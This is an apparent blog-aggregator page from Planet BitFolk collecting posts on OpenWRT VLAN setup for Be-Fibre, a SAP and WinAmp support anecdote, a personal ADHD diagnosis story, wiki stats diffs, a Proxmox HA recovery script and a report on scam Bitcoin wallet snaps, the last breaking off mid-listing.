Planet BitFolk

Chris WallaceNon-Eulerian paths

I’ve been doing a bit of work on Non-Eulerian paths.  I haven't made any algorithmic progress...

Jon SpriggsReplacing Be-Fibre’s router with an OpenWRT-based router

I’d seen quite a few comments from the community talking about using your own router, and yesterday I finally got around to sorting this out for myself!

I obtained a Turris Omnia CZ11NIC13 router last year to replace the Be-Fibre supplied Adtrans 854-v6. Both Adtrans and Omnia use an SFP to terminate the fibre connection on-box, but if you have an ONT then the Omnia will activate the WAN Ethernet socket if the SFP isn’t filled.

The version I was using was a little on the older side than the currently listed models, and the version of OpenWRT that was shipped on it kept breaking when trying to perform updates and upgrades. I followed the instructions on the OpenWRT Wiki to replace the custom firmware with the more generic OpenWRT for this model (upgrading U-Boot and then flashing the updated image using dd in the rescue environment).

Initial stumbles

I’d said I’d got this last year, and when I’d tried to migrate it over, it wasn’t clear that the SFP had been detected… On this router eth2 is either the WAN Ethernet interface or the SFP, and the only way you can tell is to run dmesg | grep ether which shows configuring for inband/1000base-x link mode (it’s on the SFP) or configuring for fixed/rgmii link mode (it’s on the ethernet port). Once you realise that, it all becomes a bit easier!

Getting ready

The main thing to realise about this process is that Be-Fibre only really care about two things; the MAC address of the router (the SFP doesn’t have a MAC address) and the VLAN it’s connected to – which is VLAN 10.

So, let’s set that up.

Using the Web interface

The first thing we need to do is to change the MAC address of “eth2” – the WAN/SFP port. Navigate to to “Network” then “Interfaces” and select the “Devices” tab.

The devices page of the OpenWRT web interface before any changes have been made to it.

Click “Configure…” next to eth2 to change the MAC address. Here I’ve changed it to “DE:CA:FB:AD:99:99” which is the value I got from my Be-Fibre router.

Once you click “Save” you go back to the devices page, and you can see here that the changed MAC address is now in bold.

Next we need to setup the VLAN tag, so click on “Add device configuration…”

Once you click “Save”, you’ll be taken back to the devices page.

Click on “Save & Apply”, and then go into the “Interfaces” tab.

You may see that an IP address has been allocated to the wan interface… Don’t believe it! You still need to select the VLAN Tagged interface for it to work! Click “Edit” for the wan interface.

Change device to eth2.10 and click Save. Do the same for the wan6 interface.

Click Save & Apply and then navigate to the “System” -> “Reboot” screen and reboot the device to get the network changes recognised.

Using the command line

SSH to the OpenWRT device, and then run the following (replace MAC address as needed!)

eth2=$(uci show network.@device[1] | grep =device | cut -d= -f1 | cut -d. -f2)
uci set network.${eth2}.macaddr='DE:CA:FB:AD:99:99'
uci commit network

if ! ip link show dev eth2.20
then
  uci add network device
  uci set network.@device[-1].type='8021q'
  uci set network.@device[-1].ifname='eth2'
  uci set network.@device[-1].vid='10'
  uci set network.@device[-1].name='eth2.10'
  uci commit network
fi

uci set network.wan.device='eth2.10'
uci set network.wan6.device='eth2.10'
uci commit network
reload_config

Alan PopeSAP Upgrade: The Sound of Silence

This is the seventh in an increasingly infrequent series of Friday Tales From Tech Support. Some stories from the past featuring broken computers and even more broken tech support operatives - mostly me.

London. Summer 2002

In the early 2000s I worked as a SAP Technical Consultant which involved teaching courses, advising customers, and doing SAP installations, upgrades and migrations.

This story starts on a typical mid-summer, warm and stuffy day in London. I arrive for the first and only time to a small, second-floor office in a side road, just off Regent Street, in the centre of town. The office was about the size and shape of Sherlock’s flat in the modern hit BBC TV show of the same name, and was clearly previously residential accomodation, lightly converted.

The company was a small SAP Consultancy whose employees were mostly out of the office, clocking up billable hours on-site with their customers. Only a few staff remained in the office, including the CEO, an office administrator, and one consultant.

In the main lounge area of the office were three desks, roughly arranged. A further, larger desk was located in an adjoining office, likely previously a bedroom, where the CEO sat. Every desk had the typical arrangement office desk phone, Compaq Laptop PC, trailing cables and stationery.

In addition, dominating the main office, in the middle of the floor, was an ominous, noisy, and very messily populated 42U rack. It had no doors, and there was no air conditioning to speak of. The traditional sash windows were open, allowing the hot air from outside the flat to mix with the hotter air within.

It was like a sauna in there.

Rack space

My (thankfully) single-day job was to perform some much-needed software upgrades on a server in the rack. Consultancies like these often had their own internal development SAP systems which they’d use to prototype on, make demos, or develop entire solutions with.

Their SAP system was installed on enormous Compaq Proliant server, mounted in the middle of the rack. It featured the typical beige Compaq metalwork with an array of drives to hold the OS, database, application and data. Under that was a DLT 40-80 tape drive for doing backups, and a pile of tapes.

There was a keyboard and display in the rack, which was powered off, and disconnected. I was told the display would frequenly get “borrowed” to give impromptu presentations in the CEOs office. So they tended to use VNC or RDP into Windows to remotely administer the server, whether via the Internet, or locally from their desk in the office.

Some assorted networking and other random gear that I didn’t recognise was scattered around a mix of cables in the rack.

Time is ticking

There was clearly some pressure to get the software upgrades done promptly, ready for a customer demo or something I wasn’t privy to the details of. I was just told to “upgrade the box, and get it done today.”

I got myself on the network and quickly became familiar with the setup, or so I thought. I started a backup, like a good sysadmin, because from what I could tell, they hadn’t done one recently. (See tfts passim for further backup-related tales.)

I continued with the upgrade, which required numerous components to be updated and restarted, as is the way. Reboots, updates, more reboots, patches, SAP System Kernel updates, SAP Support Packages, yadda yadda.

Trouble brewing

While I was immersed in my world of downloading and patching, something was amiss. The office administrator and the CEO were taking calls, transferring calls, and shouting to eachother from the lounge office to the bedroom office. There was an air of frustration in the room, but it was none of my business.

Apparently some Very Important People were supposed to be having High Level conversations on the phone, but they kept getting cut off, or the call would drop, or something. Again, none of my business, just background noise while I was working to a deadline.

Except it was made my business.

After a lot of walking back-and-forth between the the offices, shouting, and picking up and slamming down phones, the CEO came to me and bluntly asked me:

What did you do?

This was an excellent question, that I didn’t have a great answer for besides:

I dunno, what did I do?

Greensleeves

It turns out the whole kerfuffle was because I had unwittingly done something.

I was unaware that not only was the server running the very powerful, very complex, and very important SAP Enterprise Resource Planning software.

It also ran the equally important and business critical application and popular MP3 player: WinAmp.

There was a sound card in the server. The output of which was sent via an innocuous-looking audio cable to the telephony system.

The Important People were calling in, getting transferred to the CEOs phone, then upon hearing silence, assumed the call had dropped, and hang up. They would then call back, with everyone getting increasingly frustrated in the process.

The very familiar yellow ’lightning bolt’ WinAmp icon, which nestled in the Windows System Tray Notification Area had gone completely unnoticed by me.

When I had rebooted the server, WinAmp didn’t auto-start, so no music played out to telephone callers who were on hold. At best they got silence, and at worst, static or 50Hz mains hum.

The now-stroppy CEO stomped over to the rack and wrestled with the display to re-attach it, along with a keyboard & mouse to the server. He then used them to log-in to the Windows 2000 desktop, launch WinAmp manually, load a playlist, and hit play.

I apologised, completed my work, said goodbye, and thankfully for everyone involved, never went back to that London hot-box again.

Alan PopeToday is my Birthday! I got ADHD

This is a deeply personal post. Feel free to skip this if you’re only here for the Linux and open-source content. It’s also a touch rambling. As for the title, no, I didn’t “get” ADHD on my birthday; obviously, that’s humourous literary hyperbole. Read on.

LET age = age + 1

Like a few billion others, I managed to cling to this precious rock we call home and complete a 52nd orbit of our nearest star. What an achievement!

It’s wild for me to think it’s been that long since I innocently emerged into early 1970s Southern Britain. Back then, the UK wasn’t a member of the European Common Market and was led by a Conservative government that would go on to lose the next election.

Over in the USA, 1972 saw the beginning of the downfall of a Republican President during the Watergate Scandal.

How times change. /s

Back then Harry Nilsson - Without You topped the UK music chart, while in Australia Don McLean - American Pie occupied the number one spot. Across the pond, America - A Horse With No Name was at the top of the US Billboard Hot 100, while upstairs in Canada, they enjoyed Anne Murray - Cotton Jenny it seems. All four are great performances in their own right.

Meanwhile, on the day I was born, Germany’s chart was led by Die Windows—How Do You Do?, which is also a song.

WHILE age <= 18

I grew up in the relatively prosperous South of England with two older siblings, parents who would eventually split, and a cat, then a dog. Life was fine, as there was food on the table, a roof over our heads, and we were all somewhat educated.

In my teenage years, I didn’t particularly enjoy school life. I mean, I enjoyed the parts where I hung out with friends and talked for hours about computers, games, and whatever else teenagers talk about. However, the actual education and part-time bullying by other pupils degraded the experience somewhat.

I didn’t excel in the British education system but scraped by. Indeed, I got a higher GCSE grade for French than English, my mother tongue. L’embarras!

My parents wanted me to go on to study A-Levels at Sixth-Form College, then on to University. I pushed back hard and unpleasantly, having not enjoyed or flourished in the UK state academic system. After many arguments, I entered the local Technical College to study for a BTEC National Diploma in Computer Studies.

This was a turning point for me. Learning to program in the late 1980s in 6502 assembler on a BBC Micro, dBase III on an IBM XT, and weirdly, COBOL on a Prime Minicomputer set me up for a career in computing.

IF income = 0 THEN GO SUB job

Over the intervening thirty years, I’ve had a dozen or so memorable jobs. Some have lasted years, others are just short contracts, taking mere months. Most have been incredibly enjoyable alongside excellent people in wonderful places. Others, less so. Pretty typical, I imagine.

During that time, it’s been clear in my head that I’m a nerd, a geek, or an enthusiast who can get deep into a subject for hours if desired. I’ve also had periods of tremendous difficulty with focus, having what feels like an endless task list, where I’d rapidly context switch and never complete anything.

The worst part is that for all that time, I thought this was just ‘me’ and these were “un-fixable” flaws in my character. Thinking back, I clearly didn’t do enough self-reflection over those thirty years.

BRIGHT 1; FLASH 1

The most mentally and emotionally challenging period of my life has been the last four years.

I consider myself a relatively empathetic and accommodating person. I have worked with, managed, and reported to non-neurotypical people in the tech space, so I had some experience.

In recent times, I have become significantly more aware and empathetic of the mental health and neurodiversity challenges others face. The onset of dementia in one family member, late diagnosis of bipolar & hypomania in another, and depression & self-harm in others, all in the space of a year, was a lot to take on and support.

After all that, something started to reveal itself more clearly.

INPUT thoughts

In my ~50 years, nobody has ever asked me, “Do you think you might be on the autistic spectrum?”. Is that something respectful strangers or loving family ask? Perhaps not.

A few years ago, at a family event, I said aloud, “You know, I feel I might be a bit ‘on the spectrum,’” which was immediately dismissed by a close family member who’d known me my entire life. “Oh”, I thought and pushed that idea to the back of my mind.

Then, in 2022, after the recent family trauma, the thoughts came back, but not enough to prompt me to get a diagnosis. I did attempt to get help through therapy and coaching. While this helped, it wasn’t enough, although it did help to nudge me in the right direction.

In 2023, I took a simple online test for ADHD & Autistic Spectrum Condition, which suggested I had some traits. I’m no expert, and I don’t believe all online medical surveys, so I made an appointment with my GP. That was exactly one year ago.

Note: I live in the UK, where the National Health Service is chronically underfunded and undervalued. The people who work for the NHS do their best, and I greatly value the services they provide.

GOTO doctor

I’m grateful to have known my Doctor for over 20 years. He’s been a thoughtful, accessible rock for our family through many medical issues. So when I arrived at my appointment and detailed the various reasons why I think I may have some kind of ADHD, it was a great comfort to hear him say, “Yes, it certainly sounds like it, given I have ADHD and do many of the same things.”

Not a diagnosis, but on that day I felt a weight had been ever so slightly lifted. I appreciate that some may feel labels aren’t necessary, but we can just get by without having to be put in little boxes. That’s fine, but I disagree. I needed this, but I didn’t know that until I heard it.

Imagine being at the bottom of a well your entire life and thinking that was how it was for everyone. Then, one day, someone lowered a bucket, and you looked up. That was how it felt for me.

Due to the interesting way healthcare works in the UK, under the NHS, and without a private healthcare plan, I was offered a number of options:

  1. Do nothing. I seemingly made it to ~50 years old without a diagnosis. Maybe I don’t need to do anything more about this.
  2. Pay ~£2K for an immediate private diagnosis appointment.
  3. Go on the NHS waiting list for anything up to three years for an initial appointment with a specialist.
  4. Get an NHS referral to a 3rd party partner healthcare provider. So-called “Right to choose
  5. Self-refer to a private provider on a waiting list.

I figured that while yes, I have successfully attained over 50 solar orbits, I would like some closure on the issue. It wasn’t urgent enough to pay Apple-Laptop-levels of private costs, but more urgent than “After both the next Summer and Winter Olympic games”.

I suffered quite significant anxiety over the months leading up to and after this appointment. I felt I knew inside that there was something amiss. I knew whatever it was, it was adversely affecting many parts of my life, including work. I was somewhat keen to get this resolved as soon as I could.

So, I opted for both (4) and (5) to see which one would respond first and take that option. In the end, the private provider came back with availability first - six months later, so I opted for that at my own cost. The NHS partner provider came back to me almost a year after my initial GP appointment.

PAUSE 0

The appointment came through in late December 2023. I was asked a significant number of questions during the local in-person session. We discussed a range of topics from my early school memories, to work experience in between, and right up to the present day. It took a fair while, and felt very comprehensive. More so than a 10-question online form.

At the end of the meeting, I was given the diagnosis.

Moderate-Severe Adult ADHD - combined type ICD10 Code F90.0
ASC Traits ?likely ASC.

Essentially, I have ADHD and probably lie somewhere on the Autistic Spectrum.

It’s possible that anyone who has known me for any length of time, either in “meatspace” or online, may well be saying, “Duh! Of course, you are.

Sure, it may well be obvious to anyone looking down into a well that there’s someone at the bottom, but that perspective wasn’t obvious to me.

This got me out of the well, but the journey wasn’t over. Nothing has inherently been solved per se by having the diagnosis, but it helps me to put some of the pieces of my life in order and understand them better.

The whole process got me thinking a lot more deeply about certain stages and experiences in my life. Since the diagnosis, I have had a significant number of “Oh, that explains that!” moments both for current behaviours and many past ones.

READ choices

At the appointment, I was presented with further choices regarding what to do next. Do I seek medication or cognitive behavioural therapy, or again, do nothing. Some people choose medication, others do not. It’s a very personal decision. Each to their own. I chose the medication route for now, but that may change based on my personal experience.

I was offered two options, Atomoxetine or Lisdexamfetamine. Check the (Wikipedia) links for details and the list of common side effects. I won’t go into that here.

I opted for Lisdexamfetamine which I’m prescribed to take each day that I “need” it. Typically, that means I only tend to take it on work days, not at weekends or during holidays. However, some people take it every day. Some take it in the morning only. While others also take some in the afternoon, once the morning dosage has “worn off”.

Unfortunately, it’s not just a case of “pop the pill and all is sorted”, obviously. Getting the dosage right has been quite a challenge. As I’m under a private consultant, and the medicine is a “Class B Controlled Drug” in the UK, I am only allowed 30-days prescription at a time.

That means I have to contact the prescribing Consultant Psychiatrist regularly to get a repeat prescription through the post. It can also be tricky finding a pharmacy that has the medicine in stock.

On one occasion I was given half the amount prescribed, along with an IOU for the remainder, to collect at a later date. On another, the pharmacy had none in stock, but ordered it for next day delivery. I heard similar horror stories from others, but consider myself lucky so far.

Further, as I’m under a private consultation, I am paying between £70 and £110 per month for the amount I’m prescribed. Once the dosage is stabilised, in theory, the prescription will instead be issued by my NHS General Practitioner, and the price to me should drop to a more palatable £9.65.

RESTORE 52

The reason I published this article on this day, my birthday (with that title) is because I think we’ve finally reached the right dosage. I am finding myself able to focus and concentrate better, I’m less “scatterbrained” in the mornings, and feel less likely to forget, misplace and “drop” things.

The last four years have been crap. They’re getting better. Starting now.

CONTINUE

This was a rather personal account of the continuing journey of me, popey. Other people make different choices, have alternate outcomes, and may not feel comfortable explaining as I have.

Equally you may find it odd that someone would write all this down, in public. It may well be. It helped me to write it, and it might help someone else to read it. If that’s not you, that’s okay too.

Finally, if you’re dealing with similar neuro-divergency traits, and are experiencing it differently from me, that’s also fine. We’re all a bit different. That’s a good thing.

STOP

Yes, I used Sinclair Spectrum (get it? - ED) commands as headings. Sorry.

BitFolk WikiCommunity

Telegram: stats are now updated

← Older revision Revision as of 01:58, 2 April 2024
Line 68: Line 68:


{| class="wikitable" style="float:right; width:25em"
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:bftg_stats_at}} GMT (<span style="color:red">mock figures; not yet being updated</span>)
|+ Usage stats as of {{#external_value:bftg_stats_at}} GMT
|-
|-
!colspan="3" | Messages in the last…
!colspan="3" | Messages in the last…

BitFolk WikiCommunity

Telegram: stats are now updated

← Older revision Revision as of 01:58, 2 April 2024
(2 intermediate revisions by the same user not shown)
Line 12: Line 12:


=== users ===
=== users ===
{{#get_web_data:url=https://strugglers.net/~andy/social-stats/mmusers.yaml
|format=yaml
|data=mmusers_stats_at=stats_at,mmusers_last_6hour=messages_last_6hour,mmusers_last_day=messages_last_day,mmusers_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:mmusers_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:mmusers_last_6hour}}
| {{#external_value:mmusers_last_day}}
| {{#external_value:mmusers_last_30day}}
|}
* [https://mailman.bitfolk.com/mailman/postorius/lists/users.mailman.bitfolk.com/ Subscribe]
* [https://mailman.bitfolk.com/mailman/postorius/lists/users.mailman.bitfolk.com/ Subscribe]
* [https://mailman.bitfolk.com/mailman/hyperkitty/list/users@mailman.bitfolk.com/ Archives]
* [https://mailman.bitfolk.com/mailman/hyperkitty/list/users@mailman.bitfolk.com/ Archives]


Discussions between customers, and less important announcements, can take place on BitFolk's users mailing list. Every customer is invited to this list at sign-up time, but it is optional. If you're subscribed to this list then you will also receive copies of announcements, so you don't need to be on both lists.
Discussions between customers, and less important announcements, can take place on BitFolk's users mailing list. Every customer is invited to this list at sign-up time, but it is optional. If you're subscribed to this list then you will also receive copies of announcements, so you don't need to be on both lists.
<div style="clear: both;"></div>


== Group Chat ==
== Group Chat ==
Line 28: Line 45:


{| class="wikitable" style="float:right; width:25em"
{| class="wikitable" style="float:right; width:25em"
|+ Stats as of {{#external_value:irc_stats_at}} GMT
|+ Usage stats as of {{#external_value:irc_stats_at}} GMT
|-
|-
!colspan="3" | Messages in the last…
!colspan="3" | Messages in the last…
Line 45: Line 62:


=== Telegram ===
=== Telegram ===
{{#get_web_data:url=https://ruminant.bitfolk.com/social-stats/tg.yaml
|format=yaml
|data=bftg_stats_at=stats_at,bftg_last_6hour=messages_last_6hour,bftg_last_day=messages_last_day,bftg_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:bftg_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:bftg_last_6hour}}
| {{#external_value:bftg_last_day}}
| {{#external_value:bftg_last_30day}}
|}
* [https://t.me/+hRAT7UOOJFc1MDE0 Invite link]
* [https://t.me/+hRAT7UOOJFc1MDE0 Invite link]
* [[Telegram|More info]]
* [[Telegram|More info]]


BitFolk recently gained a Telegram group.
BitFolk recently gained a Telegram group.
<div style="clear: both;"></div>


=== Matrix ===
=== Matrix ===

BitFolk WikiCommunity

Telegram: stats are now updated

← Older revision Revision as of 01:58, 2 April 2024
(3 intermediate revisions by the same user not shown)
Line 12: Line 12:


=== users ===
=== users ===
{{#get_web_data:url=https://strugglers.net/~andy/social-stats/mmusers.yaml
|format=yaml
|data=mmusers_stats_at=stats_at,mmusers_last_6hour=messages_last_6hour,mmusers_last_day=messages_last_day,mmusers_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:mmusers_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:mmusers_last_6hour}}
| {{#external_value:mmusers_last_day}}
| {{#external_value:mmusers_last_30day}}
|}
* [https://mailman.bitfolk.com/mailman/postorius/lists/users.mailman.bitfolk.com/ Subscribe]
* [https://mailman.bitfolk.com/mailman/postorius/lists/users.mailman.bitfolk.com/ Subscribe]
* [https://mailman.bitfolk.com/mailman/hyperkitty/list/users@mailman.bitfolk.com/ Archives]
* [https://mailman.bitfolk.com/mailman/hyperkitty/list/users@mailman.bitfolk.com/ Archives]


Discussions between customers, and less important announcements, can take place on BitFolk's users mailing list. Every customer is invited to this list at sign-up time, but it is optional. If you're subscribed to this list then you will also receive copies of announcements, so you don't need to be on both lists.
Discussions between customers, and less important announcements, can take place on BitFolk's users mailing list. Every customer is invited to this list at sign-up time, but it is optional. If you're subscribed to this list then you will also receive copies of announcements, so you don't need to be on both lists.
<div style="clear: both;"></div>


== Group Chat ==
== Group Chat ==
Line 21: Line 38:


=== IRC ===
=== IRC ===
{{#get_web_data:url=https://strugglers.net/~andy/social-stats/irc.yaml
|format=yaml
|data=irc_stats_at=stats_at,irc_last_6hour=messages_last_6hour,irc_last_day=messages_last_day,irc_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:irc_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:irc_last_6hour}}
| {{#external_value:irc_last_day}}
| {{#external_value:irc_last_30day}}
|}
* [[IRC|More info]]
* [[IRC|More info]]


BitFolk has had an IRC channel since late 2006; it still exists though it is these days very quiet. It can be found at #BitFolk on [https://libera.chat/ Libera].
BitFolk has had an IRC channel since late 2006; it still exists though it is these days very quiet. It can be found at #BitFolk on [https://libera.chat/ Libera].
<div style="clear: both;"></div>


=== Telegram ===
=== Telegram ===
{{#get_web_data:url=https://ruminant.bitfolk.com/social-stats/tg.yaml
|format=yaml
|data=bftg_stats_at=stats_at,bftg_last_6hour=messages_last_6hour,bftg_last_day=messages_last_day,bftg_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:bftg_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:bftg_last_6hour}}
| {{#external_value:bftg_last_day}}
| {{#external_value:bftg_last_30day}}
|}
* [https://t.me/+hRAT7UOOJFc1MDE0 Invite link]
* [https://t.me/+hRAT7UOOJFc1MDE0 Invite link]
* [[Telegram|More info]]
* [[Telegram|More info]]


BitFolk recently gained a Telegram group.
BitFolk recently gained a Telegram group.
<div style="clear: both;"></div>


=== Matrix ===
=== Matrix ===

BitFolk WikiCommunity

users: mailing list stats now updating

← Older revision Revision as of 00:56, 2 April 2024
(2 intermediate revisions by the same user not shown)
Line 12: Line 12:


=== users ===
=== users ===
{{#get_web_data:url=https://strugglers.net/~andy/social-stats/mmusers.yaml
|format=yaml
|data=mmusers_stats_at=stats_at,mmusers_last_6hour=messages_last_6hour,mmusers_last_day=messages_last_day,mmusers_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:mmusers_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:mmusers_last_6hour}}
| {{#external_value:mmusers_last_day}}
| {{#external_value:mmusers_last_30day}}
|}
* [https://mailman.bitfolk.com/mailman/postorius/lists/users.mailman.bitfolk.com/ Subscribe]
* [https://mailman.bitfolk.com/mailman/postorius/lists/users.mailman.bitfolk.com/ Subscribe]
* [https://mailman.bitfolk.com/mailman/hyperkitty/list/users@mailman.bitfolk.com/ Archives]
* [https://mailman.bitfolk.com/mailman/hyperkitty/list/users@mailman.bitfolk.com/ Archives]


Discussions between customers, and less important announcements, can take place on BitFolk's users mailing list. Every customer is invited to this list at sign-up time, but it is optional. If you're subscribed to this list then you will also receive copies of announcements, so you don't need to be on both lists.
Discussions between customers, and less important announcements, can take place on BitFolk's users mailing list. Every customer is invited to this list at sign-up time, but it is optional. If you're subscribed to this list then you will also receive copies of announcements, so you don't need to be on both lists.
<div style="clear: both;"></div>


== Group Chat ==
== Group Chat ==
Line 21: Line 38:


=== IRC ===
=== IRC ===
{{#get_web_data:url=https://strugglers.net/~andy/social-stats/irc.yaml
|format=yaml
|data=irc_stats_at=stats_at,irc_last_6hour=messages_last_6hour,irc_last_day=messages_last_day,irc_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:irc_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:irc_last_6hour}}
| {{#external_value:irc_last_day}}
| {{#external_value:irc_last_30day}}
|}
* [[IRC|More info]]
* [[IRC|More info]]


BitFolk has had an IRC channel since late 2006; it still exists though it is these days very quiet. It can be found at #BitFolk on [https://libera.chat/ Libera].
BitFolk has had an IRC channel since late 2006; it still exists though it is these days very quiet. It can be found at #BitFolk on [https://libera.chat/ Libera].
<div style="clear: both;"></div>


=== Telegram ===
=== Telegram ===
{{#get_web_data:url=https://ruminant.bitfolk.com/social-stats/tg.yaml
|format=yaml
|data=bftg_stats_at=stats_at,bftg_last_6hour=messages_last_6hour,bftg_last_day=messages_last_day,bftg_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Usage stats as of {{#external_value:bftg_stats_at}} GMT (<span style="color:red">mock figures; not yet being updated</span>)
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:bftg_last_6hour}}
| {{#external_value:bftg_last_day}}
| {{#external_value:bftg_last_30day}}
|}
* [https://t.me/+hRAT7UOOJFc1MDE0 Invite link]
* [https://t.me/+hRAT7UOOJFc1MDE0 Invite link]
* [[Telegram|More info]]
* [[Telegram|More info]]


BitFolk recently gained a Telegram group.
BitFolk recently gained a Telegram group.
<div style="clear: both;"></div>


=== Matrix ===
=== Matrix ===

BitFolk WikiCommunity

Add IRC stats

← Older revision Revision as of 22:31, 1 April 2024
Line 21: Line 21:


=== IRC ===
=== IRC ===
{{#get_web_data:url=https://strugglers.net/~andy/social-stats/irc.yaml
|format=yaml
|data=irc_stats_at=stats_at,irc_last_6hour=messages_last_6hour,irc_last_day=messages_last_day,irc_last_30day=messages_last_30day
}}
{| class="wikitable" style="float:right; width:25em"
|+ Stats as of {{#external_value:irc_stats_at}} GMT
|-
!colspan="3" | Messages in the last…
|-
! 6 hours || 24 hours || 30 days
|- style="text-align:center"
| {{#external_value:irc_last_6hour}}
| {{#external_value:irc_last_day}}
| {{#external_value:irc_last_30day}}
|}
* [[IRC|More info]]
* [[IRC|More info]]


BitFolk has had an IRC channel since late 2006; it still exists though it is these days very quiet. It can be found at #BitFolk on [https://libera.chat/ Libera].
BitFolk has had an IRC channel since late 2006; it still exists though it is these days very quiet. It can be found at #BitFolk on [https://libera.chat/ Libera].
<div style="clear: both;"></div>


=== Telegram ===
=== Telegram ===

Jon SpriggsA note to myself; resetting error status on proxmox HA workloads after a crash

I’ve had a couple of issues with brown-outs recently which have interrupted my Proxmox server, and stopped my connected disks from coming back up cleanly (yes, I’m working on that separately!) but it’s left me in a state where several of my containers and virtual machines on the cluster are down.

It’s possible to point-and-click your way around this, but far easier to script it!

A failed state may look like this:

root@proxmox1:~# ha-manager status
quorum OK
master proxmox2 (active, Fri Mar 22 10:40:49 2024)
lrm proxmox1 (active, Fri Mar 22 10:40:52 2024)
lrm proxmox2 (active, Fri Mar 22 10:40:54 2024)
service ct:101 (proxmox1, error)
service ct:102 (proxmox2, error)
service ct:103 (proxmox2, error)
service ct:104 (proxmox1, error)
service ct:105 (proxmox1, error)
service ct:106 (proxmox2, error)
service ct:107 (proxmox2, error)
service ct:108 (proxmox1, error)
service ct:109 (proxmox2, error)
service vm:100 (proxmox2, error)

Once you’ve fixed your issue, you can do this on each node:

for worker in $(ha-manager status | grep "($(hostnamectl hostname), error)" | cut -d\  -f2)
do
  echo "Disabling $worker"
  ha-manager set $worker --state disabled
  until ha-manager status | grep "$worker" | grep -q disabled ; do sleep 1 ; done
  echo "Restarting $worker"
  ha-manager set $worker --state started
  until ha-manager status | grep "$worker" | grep -q started ; do sleep 1 ; done
done

Note that this hasn’t been tested, but a scan over it with those nodes working suggests it should. I guess I’ll be updating this the next time I get a brown-out!

Alan PopeGuess Who's Back? Exodus Scam BitCoin Wallet Snap!

Previously…

Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.

The snap was eventually removed, and some threads were started over on the Snapcraft forum

Groundhog Day

Nothing has changed it seems, because once again, ANOTHER TEN scam BitCoin wallet apps have been published in the Snap Store today.

You’re joking! Not another one!

Yes, Brenda!

This one has the snappy (sorry) name of exodus-build-96567 published by that not-very-legit looking publisher digisafe00000. Uh-huh.

Edit: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular crypto wallet brand names.

Publisher digisafe00000

Edit: These were removed. One day later, they popped up again, under a new account. I reported all of them, and pinged someone at Canonical to get them removed.

Publisher codeshield0x0000

There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.

Presentation

Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 - which may be gone by the time you see this. A real minimum effort on the store listing page here. But I’m sure it could fool someone, they usually do.

A not very legit looking snap

It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.

Note: Do not install this.

Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.

Although it is “Safe”, apparently, according to the store listing.

Coming to a desktop near you

Open wide

It looks like the exodus-build-96567 snap was only published to the store today. I wonder what happened to builds 1 through 96566!

$ snap info
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
 latest/stable: 8.6.5 2024-03-18 (1) 565kB -
 latest/candidate: ↑
 latest/beta: ↑
 latest/edge: ↑

Here’s the app running in a VM.

The application

If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.

Give us all your money

As with all these scam application, all it does is ask for a BitCoin recovery phrase, and with that will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.

When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.

Error

What’s inside?

While the snap is still available for download from the store, I grabbed it.

$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
 snap ack exodus-build-96567_1.assert
 snap install exodus-build-96567_1.snap

I then unpacked the snap to take a peek inside.

unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write

[===========================================================|] 32/32 100%

created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks

There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin application binary in bin/.

tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
